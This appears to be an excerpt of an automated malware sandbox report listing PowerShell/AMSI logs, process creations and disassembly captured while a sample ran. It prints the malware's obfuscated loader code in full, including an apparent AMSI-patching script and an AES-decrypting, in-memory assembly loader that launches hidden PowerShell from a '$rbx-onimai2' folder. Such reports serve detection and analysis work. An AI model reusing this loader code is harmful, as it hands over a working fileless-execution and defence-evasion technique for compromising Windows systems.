Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: DetailSequence=1DetailTotal=1SequenceNumber=27UserId=WORKGROUP\SYSTEMHostName=ConsoleHostHostVersion=5.1.19041.1682HostId=fa30d40e-d0d2-4405-85db-7bb3a1a8c1b8HostApplication=C:\Windows\System32\Window
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY

Suspicious command line found

Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,

19_2_0000022413901E3C

Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138EA7DD push rcx; retf 003Fh	19_3_00000224138EA7DE
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E1A7DD push rcx; retf 003Fh	20_3_000002BCD7E1A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8B23FB pushad ; retf	36_2_00007FFD9B8B2411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BFFE push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98B7F8 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C829 push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BF5F push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C749 push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BE69 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98CA5F push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BD89 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C9BE push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C1DA push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C1A0 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C91F push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C09F push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E8A7DD push rcx; retf 003Fh	37_3_0000026504E8A7DE
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1AAA7DD push rcx; retf 003Fh	38_3_0000025DC1AAA7DE
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC62A7DD push rcx; retf 003Fh	39_3_00000225DC62A7DE
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0ACA7DD push rcx; retf 003Fh	40_3_00000202C0ACA7DE
